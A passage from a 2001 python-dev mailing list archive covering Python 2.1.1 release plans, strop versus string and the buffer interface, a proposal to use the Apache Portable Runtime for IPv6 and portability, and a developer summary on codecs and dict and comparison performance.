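For a module containing `import os`, `limit = 10` and a function that declares `global counter` and then assigns `counter = 1`, `global_slots` yields the slots `bump`, `counter`, `limit` and `os`. Loading the still-unbound `counter` slot falls through to the builtins and raises `NameError`. Binding `len` dynamically makes `load_builtin("len")` return the shadowing value instead of the builtin.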
These mechanisms would have little if any cost for the common case where a module's global namespace is not modified in strange ways at runtime. They would add overhead for modules that did unusual things with global names, but this is an uncommon practice and probably one worth discouraging. It may be desirable to disable dynamic additions to the global namespace in some future version of Python. If so, the new implementation could provide warnings. Local Variables: mode: indented-text indent-tabs-mode: nil End: From barry@digicool.com Thu May 24 03:46:30 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 22:46:30 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> Message-ID: <15116.30214.900667.624573@anthem.wooz.org> >>>>> "ESR" == Eric S Raymond writes: ESR> Before you could say "plot complication" I was materializing ESR> in the Hyraxeum -- damn near nose-to-trunk with the High ESR> Pachyderm himself, as it turned out, who was getting wound up ESR> to try out his newest human-goad on a mahout they had just ESR> captured from the Fortified Cities. That big self-important elephant wasn't named Puffy the Frog by any chance, was he? Did he taste vaguely lemony? If so, he's got a lot of nerve calling himself the "High Pachyderm"! Quite a lofty title for one who's skin is stretched to just this side of its tensile breaking point. Sure, I know ol' Puffy, had a few binges with the old goat myself. You just don't want to be near him when the stray micro-meteor happens to pierce his dermis. Much, MUCH messier than eight crates of cornbob filled to the brim with radioactive gorilla poop, I can assure you! now-where'd-i-leave-my-medication?-ly y'rs, -Barry From esr@thyrsus.com Thu May 24 04:04:58 2001 From: esr@thyrsus.com (Eric S.
Raymond) Date: Wed, 23 May 2001 23:04:58 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.30214.900667.624573@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 10:46:30PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> Message-ID: <20010523230458.A28895@thyrsus.com> Barry A. Warsaw : > That big self-important elephant wasn't named Puffy the Frog by any > chance, was he? Did he taste vaguely lemony? If so, he's got a lot > of nerve calling himself the "High Pachyderm"! Quite a lofty title > for one who's skin is stretched to just this side of its tensile > breaking point. Congratulations, Barry. I googled for "Puffy the Frog" and found a page that...explained...this. It was the #1 hit. Apparently the Universe is an even more random place than I thought. -- Eric S. Raymond If I were to select a jack-booted group of fascists who are perhaps as large a danger to American society as I could pick today, I would pick BATF [the Bureau of Alcohol, Tobacco, and Firearms]. -- U.S. Representative John Dingell, 1980 From barry@digicool.com Thu May 24 04:14:07 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 23:14:07 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> Message-ID: <15116.31871.122265.883855@anthem.wooz.org> >>>>> "ESR" == Eric S Raymond writes: ESR> Congratulations, Barry. I googled for "Puffy the Frog" and ESR> found a page that...explained...this. It was the #1 hit. Yes! In 1965. 
My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass singer in the Atlanta-based band "The Shrinking of George". What you found is no doubt the lyrics to that song, which topped the pop charts briefly in 1965 (August 1st, 1965, 11:57 - 13:01 to be exact), displacing the Beatles "I Wanna Hold Your Head" before being itself displaced by the The Bee Gee's "Booger Feever" [sic]. Sadly, even Napster doesn't have the mp3's and all Dad's old records are scratched beyond hope. ESR> Apparently the Universe is an even more random place than I ESR> thought. here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs, -Barry From esr@thyrsus.com Thu May 24 04:31:42 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 23:31:42 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 11:14:07PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> <15116.31871.122265.883855@anthem.wooz.org> Message-ID: <20010523233142.A29023@thyrsus.com> Barry A. Warsaw : > Yes! In 1965. My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass > singer in the Atlanta-based band "The Shrinking of George". I suppose it's not a coincidence that it's Fernando Poo day today. Of course it's not a coincidence. There are no coincidences anywhere. Fnord. -- Eric S. Raymond Sometimes it is said that man cannot be trusted with the government of himself. Can he, then, be trusted with the government of others? 
-- Thomas Jefferson, in his 1801 inaugural address From aahz@rahul.net Thu May 24 05:59:37 2001 From: aahz@rahul.net (Aahz Maruch) Date: Wed, 23 May 2001 21:59:37 -0700 (PDT) Subject: [Python-Dev] Killing threads In-Reply-To: from "Tim Peters" at May 23, 2001 03:45:06 PM Message-ID: <20010524045938.5228199C83@waltz.rahul.net> Tim Peters wrote: > [Aahz] >> >> (This got brought up because I experimented with os._exit() as a >> possible solution, but that GPFs on Win98SE.) > > Please open a bug report on that, then, with a tiny test case if possible. > This worked fine on Win98SE for me just now: Futz. *Now* it works. Chalk it up to another unreproducible bug caused by an unstable Win98. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From gstein@lyra.org Thu May 24 09:33:49 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 01:33:49 -0700 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.81,2.82 In-Reply-To: ; from gvanrossum@users.sourceforge.net on Mon, May 14, 2001 at 07:14:46PM -0700 References: Message-ID: <20010524013349.Y5402@lyra.org> On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote: > Update of /cvsroot/python/python/dist/src/Modules > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules > > Modified Files: > stropmodule.c > Log Message: > Add warnings to the strop module, for to those functions that really > *are* obsolete; three variables and the maketrans() function are not > (yet) obsolete. > > Add a compensating warnings.filterwarnings() call to test_strop.py. > > Add this to the NEWS. Something that I ran into the other day... 
>>> ob = some_object_implementing_the_buffer_interface >>> string.find(ob, '.') (fails because ob does not define the .find method) >>> strop.find(ob, '.') (succeeds) The point is that strop uses the t# to get a ptr/len pair to do its work. Thus, it can work on many things that export the buffer interface. Dropping strop means we no longer have many of those functions. Instead, the functionality must be copied to *every* object that implements the buffer interface. We can say ob.find() now, but we can't say find(ob) any longer. And saying that all objects (which implement the buffer API) must now implement a bunch of "standard" methods is awfully burdensome. In my particular case, I was trying to do a find on a BufferObject referring to a subset of another object. Blam. No good. Thankfully, when I did a find() on a mmap object, it worked simply because mmaps happen to define a .find method. [ of course, the find method on an mmap was totally broken, but I checked in a fix for that (last week or so) ] So... my question is: is there any way that we can retain a generic find() (and similar functions from the string/strop module) that operates on any type that implements the buffer API? Maybe there is some way we can do a mixin for Python types? e.g. "this mixin implements some standard methods for 8-bit character data (using the buffer API), which can be mixed into new Python types" That would reduce the burden for new types. Thoughts? Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein@lyra.org Thu May 24 09:52:58 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 01:52:58 -0700 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>; from guido@digicool.com on Thu, May 17, 2001 at 02:18:27PM -0400 References: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: <20010524015258.Z5402@lyra.org> On Thu, May 17, 2001 at 02:18:27PM -0400, Guido van Rossum wrote: > What's out IPv6 story? 
I recall that someone once sent me patches, > but they didn't work for me. Is it time to try again? In certain > circles IPv6 support in Python would be enough to switch programming > languages... :-) Radical suggestion: Toss out a ton of the platform-specific stuff in Python and use the Apache Portable Runtime (APR). It has IPv6 in it, but it could also help with loading shared libraries, threading, mmap'd files, sockets, etc. (it won't replace *all* of Python's platform specific stuff; I think Python has more coverage than APR does) Could simplify a number of things for Python, and reduce some of the maintenance costs... Cheers, -g -- Greg Stein, http://www.lyra.org/ From thomas@xs4all.net Thu May 24 10:01:52 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Thu, 24 May 2001 11:01:52 +0200 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: ; from mwh@python.net on Thu, May 24, 2001 at 08:37:17AM +0100 References: <20010523160025.B690@xs4all.nl> Message-ID: <20010524110152.Q676@xs4all.nl> [ Answer CC'd to python-dev since it deserves an official answer :) ] On Thu, May 24, 2001 at 08:37:17AM +0100, Michael Hudson wrote: > For summarasing purposes, do you have any idea when Python 2.1.1 will > be released? > "No" is a perfectly acceptable answer. Then "No" it is ! Even though I have a fair bit of patches in the queue right now, I need some more time to check out (no pun intended) the changes since the fork, and I want to browse the bug list for possible bugs that should be checked out and fixed for 2.1.1. Another couple of weeks at least, before a release candidate. It also depends on Moshe; if he actually releases 2.0.1 anytime soon, I'll hold off on 2.1.1 a bit longer. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal@lemburg.com Thu May 24 11:18:50 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 12:18:50 +0200 Subject: [Python-Dev] strop vs. 
string References: <20010524013349.Y5402@lyra.org> Message-ID: <3B0CE00A.488C8D73@lemburg.com> Greg Stein wrote: > > On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote: > > Update of /cvsroot/python/python/dist/src/Modules > > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules > > > > Modified Files: > > stropmodule.c > > Log Message: > > Add warnings to the strop module, for to those functions that really > > *are* obsolete; three variables and the maketrans() function are not > > (yet) obsolete. > > > > Add a compensating warnings.filterwarnings() call to test_strop.py. > > > > Add this to the NEWS. > > Something that I ran into the other day... > > >>> ob = some_object_implementing_the_buffer_interface > >>> string.find(ob, '.') > (fails because ob does not define the .find method) > >>> strop.find(ob, '.') > (succeeds) > > The point is that strop uses the t# to get a ptr/len pair to do its work. > Thus, it can work on many things that export the buffer interface. Dropping > strop means we no longer have many of those functions. Instead, the > functionality must be copied to *every* object that implements the buffer > interface. > > We can say ob.find() now, but we can't say find(ob) any longer. And saying > that all objects (which implement the buffer API) must now implement a bunch > of "standard" methods is awfully burdensome. > > In my particular case, I was trying to do a find on a BufferObject referring > to a subset of another object. Blam. No good. Thankfully, when I did a > find() on a mmap object, it worked simply because mmaps happen to define a > .find method. > > [ of course, the find method on an mmap was totally broken, but I checked in > a fix for that (last week or so) ] > > So... my question is: is there any way that we can retain a generic find() > (and similar functions from the string/strop module) that operates on any > type that implements the buffer API? > > Maybe there is some way we can do a mixin for Python types? e.g. 
"this mixin > implements some standard methods for 8-bit character data (using the buffer > API), which can be mixed into new Python types" That would reduce the burden > for new types. I suppose that in 2.2 we'll be able to build a class/type hierarchy which then provides these possibilities. I haven't followed Guido's latest checkins closely though -- could be that types don't support multiple inheritence. BTW, wouldn't it suffice to add these methods to buffer objects ? Then you could write: buffer(ob).find('.'). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From barry@digicool.com Thu May 24 12:50:34 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Thu, 24 May 2001 07:50:34 -0400 Subject: [Python-Dev] IPv6 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> Message-ID: <15116.62858.720241.46017@anthem.wooz.org> >>>>> "GS" == Greg Stein writes: GS> Toss out a ton of the platform-specific stuff in Python and GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but GS> it could also help with loading shared libraries, threading, GS> mmap'd files, sockets, etc. I don't know squat about APR, but would it have to be either-or? IOW, would it be possible to wrap the APR in a module (or package) and provide it as an importable alternative? -Barry From mal@lemburg.com Thu May 24 13:22:42 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 14:22:42 +0200 Subject: [Python-Dev] IPv6 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> Message-ID: <3B0CFD12.164271D8@lemburg.com> "Barry A. Warsaw" wrote: > > >>>>> "GS" == Greg Stein writes: > > GS> Toss out a ton of the platform-specific stuff in Python and > GS> use the Apache Portable Runtime (APR). 
It has IPv6 in it, but > GS> it could also help with loading shared libraries, threading, > GS> mmap'd files, sockets, etc. > > I don't know squat about APR, but would it have to be either-or? IOW, > would it be possible to wrap the APR in a module (or package) and > provide it as an importable alternative? Should be possible; the problem is: how do you get the APR types to interact with the original Python ones (e.g. file types). Many low-level Python functions require the native Python types, so while wrapping APR as Python module would provide an alternative, that alternative will most probably not help much w/r to simplifying portability issues. FYI, here's what the APR has to offer (taken from the APRDesign file that comes with Apache 2.0 beta): """ The base types in APR file_io File I/O, including pipes lib A portable library originally used in Apache. This contains memory management, tables, and arrays. locks Mutex and reader/writer locks misc Any APR type which doesn't have any other place to belong network_io Network I/O shmem Shared Memory (Not currently implemented) signal Asynchronous Signals threadproc Threads and Processes time Time """ It currently supports: Unix (includes BeOS), Win32 and OS/2. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From gstein@lyra.org Thu May 24 13:55:55 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 05:55:55 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <3B0CFD12.164271D8@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 02:22:42PM +0200 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> <3B0CFD12.164271D8@lemburg.com> Message-ID: <20010524055555.B5402@lyra.org> On Thu, May 24, 2001 at 02:22:42PM +0200, M.-A. Lemburg wrote: > "Barry A. 
Warsaw" wrote: > > >>>>> "GS" == Greg Stein writes: > > > > GS> Toss out a ton of the platform-specific stuff in Python and > > GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but > > GS> it could also help with loading shared libraries, threading, > > GS> mmap'd files, sockets, etc. > > > > I don't know squat about APR, but would it have to be either-or? IOW, > > would it be possible to wrap the APR in a module (or package) and > > provide it as an importable alternative? Sure, that is a possibility, but it doesn't save Python much in terms of maintenance or portability. "Just another library" Truly using it could certainly be done as a slow migration, and it is definitely possible to only use portions, subsets, etc. Another alternative would be to use APR as a "platform target". But that just adds yet another platform to support rather than simplifying. > Should be possible; the problem is: how do you get the APR types > to interact with the original Python ones (e.g. file types). Many The header is a total misnomer, but "apr_portable.h" provides access to an opaque type's underlying native object (many of us aren't sure how Ryan arrived at "portable" being the name for the least-portable aspect of the library :-). Anyways... you can extract a file descriptor from a file or socket or pipe. Or a thread ID from an thread object. etc. > low-level Python functions require the native Python types, so > while wrapping APR as Python module would provide an alternative, that > alternative will most probably not help much w/r to simplifying > portability issues. Right. I'd say use the APR functions unless absolute speed is required (such as the readlines stuff). But you could also argue that the hard-core platform specific optimizations could go into APR itself, so that Python doesn't have to worry about them. 
> FYI, here's what the APR has to offer (taken from the APRDesign > file that comes with Apache 2.0 beta): > """ > The base types in APR > file_io File I/O, including pipes > lib A portable library originally used in Apache. This contains > memory management, tables, and arrays. > locks Mutex and reader/writer locks > misc Any APR type which doesn't have any other place to belong > network_io Network I/O > shmem Shared Memory (Not currently implemented) > signal Asynchronous Signals > threadproc Threads and Processes > time Time > """ That doc is out of date; the list is missing: shared library handling, i18n, mmap, user information access (e.g. getpwnam), uuid handling, getopt replacements, cryptographic random data, and a few other bits here and there. The shared mem actually is implemented mostly, via the libmm library. And note that some of those topics have some nice depth. As I mentioned, network_io supports IPv6, but also portable name lookups, sendfile(), etc. The file_io stuff support optimized stat() and opendir-type calls for the platform. > It currently supports: Unix (includes BeOS), Win32 and OS/2. A lot more than that :-) Pretty much all the Unix variants, including OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein@lyra.org Thu May 24 14:00:16 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 06:00:16 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 12:18:50PM +0200 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> Message-ID: <20010524060016.D5402@lyra.org> On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote: > Greg Stein wrote: >... > > So... my question is: is there any way that we can retain a generic find() > > (and similar functions from the string/strop module) that operates on any > > type that implements the buffer API? 
> > > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin > > implements some standard methods for 8-bit character data (using the buffer > > API), which can be mixed into new Python types" That would reduce the burden > > for new types. > > I suppose that in 2.2 we'll be able to build a class/type > hierarchy which then provides these possibilities. I haven't > followed Guido's latest checkins closely though -- could be that > types don't support multiple inheritence. No idea either... that's why I asked. > BTW, wouldn't it suffice to add these methods to buffer objects ? > Then you could write: buffer(ob).find('.'). You're totally missing the point with that suggestion. It does *not* suffice to add them to buffer objects. What about array objects? mmap objects? Random Joe Object who implements the buffer interface? All of those are out of luck. With strop, I can pass any of those objects to strop.find(). That function has a polymorphic argument. In the current arrangement, every object must implement their own .find and .upper and .whatever. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mwh@python.net Thu May 24 14:02:34 2001 From: mwh@python.net (Michael Hudson) Date: Thu, 24 May 2001 14:02:34 +0100 (BST) Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <20010524055555.B5402@lyra.org> Message-ID: I can't think of a good way of expressing this, but I don't think we should try to make writing non cross-platform code in Python impossible. Yes, it should be easy to write x-platform code, but if there's some very specific platform trick I can do with, say, setsockopt, I don't want Python to hide it from me just 'cause it doesn't work on VMS. Maybe this isn't an issue here. On Thu, 24 May 2001, Greg Stein wrote: [...] > That doc is out of date; the list is missing: shared library handling, i18n, > mmap, user information access (e.g. 
getpwnam), uuid handling, getopt > replacements, cryptographic random data, and a few other bits here and > there. The shared mem actually is implemented mostly, via the libmm library. How big is APR? How stable? (in terms of interface; I'm assuming it doesn't crap out through bad programming or it'd be a non-starter) > And note that some of those topics have some nice depth. As I mentioned, > network_io supports IPv6, but also portable name lookups, sendfile(), etc. > The file_io stuff support optimized stat() and opendir-type calls for the > platform. > > > It currently supports: Unix (includes BeOS), Win32 and OS/2. > > A lot more than that :-) Pretty much all the Unix variants, including > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. That's still less than Python isn't it? RiscOS, Amiga, PalmOS, VMS, Playstation 2(!), from looking at http://www.python.org/download/download_other.html. Cheers, M. From gstein@lyra.org Thu May 24 14:59:21 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 06:59:21 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: ; from mwh@python.net on Thu, May 24, 2001 at 02:02:34PM +0100 References: <20010524055555.B5402@lyra.org> Message-ID: <20010524065921.E5402@lyra.org> On Thu, May 24, 2001 at 02:02:34PM +0100, Michael Hudson wrote: > I can't think of a good way of expressing this, but I don't think we > should try to make writing non cross-platform code in Python impossible. I don't think this would preclude writing non cross-platform code. As I mentioned, there isn't anything that would prevent the stuff from working side by side. The idea is to simplify certain aspects of Python's platform specific stuff. For example: all those variants of dynamically loading shared modules (Python/dynload_*.c) can be tossed along with the config magic. 
> Yes, it should be easy to write x-platform code, but if there's some very > specific platform trick I can do with, say, setsockopt, I don't want > Python to hide it from me just 'cause it doesn't work on VMS. APR isn't a least common denominator approach. >... > > That doc is out of date; the list is missing: shared library handling, i18n, > > mmap, user information access (e.g. getpwnam), uuid handling, getopt > > replacements, cryptographic random data, and a few other bits here and > > there. The shared mem actually is implemented mostly, via the libmm library. > > How big is APR? That's relative :-) On my Linux box, a stripped library is 85k. It is also (theoretically) possible to skip building portions of APR. The APIs and symbols are set up for that, but the autoconf setup isn't yet. If you're embedding a private APR build, then you can fine tune what is needed. However, if you're building a public/shared one, then you wouldn't really want to trim it back like that. > How stable? The existing functionality is quite stable. We just keep adding more, though :-) > (in terms of interface; I'm assuming it > doesn't crap out through bad programming or it'd be a non-starter) hehe... you can call it a non-starter, then. APR assumes you pass it valid pointers and objects. For example, if you call apr_file_read(NULL, NULL, 100), then you'll get a segfault rather than EINVAL. Personally, I find that behavior quite fine (EINVAL will invariably get ignored; a segfault doesn't; and this is a programmer error that needs to be attended to -- throw it in his face) Whether others think that is a non-starter... hard to know :-) [ actually, one of the hardest things to integrate would be APR's memory management approach with Python's ] > > And note that some of those topics have some nice depth. As I mentioned, > > network_io supports IPv6, but also portable name lookups, sendfile(), etc. 
> > The file_io stuff support optimized stat() and opendir-type calls for the > > platform. > > > > > It currently supports: Unix (includes BeOS), Win32 and OS/2. > > > > A lot more than that :-) Pretty much all the Unix variants, including > > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. > > That's still less than Python isn't it? RiscOS, Amiga, PalmOS, VMS, > Playstation 2(!), from looking at > http://www.python.org/download/download_other.html. Sure it's smaller. It's a blue sky radical suggestion. No more, no less. :-) I mentioned it because the IPv6 stuff came up. I already know a codebase that has handled all the portability issues. That is a bonus :-) However, for the platforms that APR *does* handle today, that would still be a big code reduction for Python. And in the future? Why not extend APR to those other platforms and reduce the Python code even more. I think shifting Python to a portability library is actually quite an interesting thought experiment. Enough to mention it and get people thinking. I think it could be quite handy for the longer term maintainability. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mal@lemburg.com Thu May 24 15:54:24 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 16:54:24 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> Message-ID: <3B0D20A0.3C881F89@lemburg.com> Greg Stein wrote: > > On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote: > > Greg Stein wrote: > >... > > > So... my question is: is there any way that we can retain a generic find() > > > (and similar functions from the string/strop module) that operates on any > > > type that implements the buffer API? > > > > > > Maybe there is some way we can do a mixin for Python types? e.g. 
"this mixin > > > implements some standard methods for 8-bit character data (using the buffer > > > API), which can be mixed into new Python types" That would reduce the burden > > > for new types. > > > > I suppose that in 2.2 we'll be able to build a class/type > > hierarchy which then provides these possibilities. I haven't > > followed Guido's latest checkins closely though -- could be that > > types don't support multiple inheritence. > > No idea either... that's why I asked. > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > Then you could write: buffer(ob).find('.'). > > You're totally missing the point with that suggestion. It does *not* suffice > to add them to buffer objects. What about array objects? mmap objects? > Random Joe Object who implements the buffer interface? That's the point: you can wrap all those into a buffer object and then use the buffer object methods to manipulate them. In that sense, buffer objects provide an adaptor to the underlying object which implements the needed methods. > All of those are out of luck. > > With strop, I can pass any of those objects to strop.find(). That function > has a polymorphic argument. > > In the current arrangement, every object must implement their own .find and > .upper and .whatever. > > Cheers, > -g > > -- > Greg Stein, http://www.lyra.org/ -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From skip@pobox.com (Skip Montanaro) Thu May 24 16:55:23 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 24 May 2001 10:55:23 -0500 Subject: [Python-Dev] strop vs. 
string In-Reply-To: <20010524060016.D5402@lyra.org> References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> Message-ID: <15117.12011.323759.496982@beluga.mojam.com> Greg> With strop, I can pass any of those objects to strop.find(). That Greg> function has a polymorphic argument. Where doesn't strop compile/run? If it works everywhere, either just rename it to be the string module (copying any bits from the existing string module that it doesn't yet have) or rename it something like buffer_funcs. Skip From skip@pobox.com (Skip Montanaro) Thu May 24 16:58:24 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 24 May 2001 10:58:24 -0500 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: References: <20010524055555.B5402@lyra.org> Message-ID: <15117.12192.114564.111578@beluga.mojam.com> >> > It currently supports: Unix (includes BeOS), Win32 and OS/2. >> >> A lot more than that :-) Pretty much all the Unix variants, including >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. Michael> That's still less than Python isn't it? RiscOS, Amiga, PalmOS, Michael> VMS, Playstation 2(!), Not to mention MacOS < X... ;-) Skip From mwh@python.net Thu May 24 17:38:37 2001 From: mwh@python.net (Michael Hudson) Date: Thu, 24 May 2001 17:38:37 +0100 (BST) Subject: [Python-Dev] python-dev summary 2001-05-10 - 2001-05-24 Message-ID: This is a summary of traffic on the python-dev mailing list between May 10 and May 24 (inclusive) 2001. It is intended to inform the wider Python community of ongoing developments. To comment, just post to python-list@python.org or comp.lang.python in the usual way. Give your posting a meaningful subject line, and if it's about a PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep iteration) All python-dev members are interested in seeing ideas discussed by the community, so don't hesitate to take a stance on a PEP if you have an opinion. 
This is the eighth summary written by Michael Hudson. Summaries are archived at:

Posting distribution (with apologies to mbm)

Number of articles in summary: 322

    Thu 10: 23    Fri 11: 25    Sat 12: 17    Sun 13: 18
    Mon 14: 28    Tue 15: 31    Wed 16: 36    Thu 17: 32
    Fri 18: 25    Sat 19:  2    Sun 20: 15    Mon 21: 18
    Tue 22: 20    Wed 23: 32

Pretty busy fortnight. The above distribution may be somewhat skewed because I changed my subscription address to python-dev and was unsubscribed for a while. Although any impact this had is probably countered by ESR and Barry's discussion of "Puffy the Frog"... * Type/class * Paul Prescod has been keeping an eye on Guido's descr-branch work, and posted concerns about when objects will have a __dict__: Then there was more technical discussion about subclassing builtin types and Steven Majewski evangelising prototype-based OO languages (though I'm not sure why!). * Easy codec access * Marc-Andre Lemburg checked in his decode string method patch, and some new codecs so you can now do things like:

    >>> "abc".encode('zlib').encode('base64')
    'eJxLTEoGAAJNASc=\n'
    >>> _.decode('base64').decode('zlib')
    'abc'

There was a small discussion on what other codecs might be handy and Guido added quoted-printable to check it was easy.
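The session above uses the Python 2 string methods of the time. In Python 3, `str.encode('zlib')` is no longer accepted; the bytes-to-bytes codecs are reached through `codecs.encode()` and `codecs.decode()` instead. A minimal sketch of the same round trip under that assumption (the helper names `encode_chain` and `decode_chain` are illustrative, not part of any library):

```python
import codecs

def encode_chain(data: bytes, *codec_names: str) -> bytes:
    """Apply bytes-to-bytes codecs from left to right."""
    for name in codec_names:
        data = codecs.encode(data, name)
    return data

def decode_chain(data: bytes, *codec_names: str) -> bytes:
    """Undo encode_chain() by decoding in the reverse order."""
    for name in reversed(codec_names):
        data = codecs.decode(data, name)
    return data

packed = encode_chain(b"abc", "zlib_codec", "base64_codec")
print(packed)  # base64 text of the zlib-compressed input, ending in b'\n'
print(decode_chain(packed, "zlib_codec", "base64_codec"))  # b'abc'
```

Quoted-printable is reachable the same way under the name `"quopri_codec"`.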
* Performance * The big discussion(s) on python-dev over the past fourteen days has centred on performance, especially on that of comparisons and the related area of dict performance. It all started with Tim Peters running a simple test program on 2.0, 2.1 and current CVS: The discussion had an unusual flavour for one about performance: a concentration on measuring performance numbers and making sure that the optimizations being discussed actually improved these numbers. This is hard; everyone wants to speed the "typical Python app" but of course there is no such thing; people have been using, amongst others, pystone, pybench and the test suite, none of which are particularly good candidates... Tim posted the distribution of sizes of dicts in a run of the test suite: which showed that small dicts are overwhelmingly the commonest. Marc piped up with an old optimization idea of his: He posted a patch to sourceforge, Tim rewrote it and checked it in, so dicts should be a little faster in 2.2. But as I said, the discussion was kicked off by the performance of comparisons, especially strings. Martin von Loewis posted some statistics from an instrumented interpreter: The issue is that the rich comparisons of Python 2.1 have added a layer of complexity to the comparisons code. Although the rich comparisons (might) provide an opportunity for faster code in some circumstances, code that still uses old-style comparisons can and does take a hit. Strings still use the old-style comparisons and are compared a *lot* (especially in dicts), so it seems "upgrading" them to rich comparisons should be a win and Marc posted a patch to sf that does this. Marc also managed to promise to make a concerted effort to find speed optimizations in the next few months: Finally, in a coda Jeremy noticed that Python spends an alarming amount of time decoding those "Oi|s#" strings that get passed to PyArg_ParseTuple: and Tim pointed out that optimizing "O" might be a win: * FP vs. 
tutorial * Tim pointed out that the tutorial currently contains examples of floating point output that is platform dependent, and that this is bad. He proposed changing the tutorial to only use fractions that can be exactly represented as floats, and adding a discussion (possibly in an appendix) of the reasons why

    >>> 0.1
    0.10000000000000001

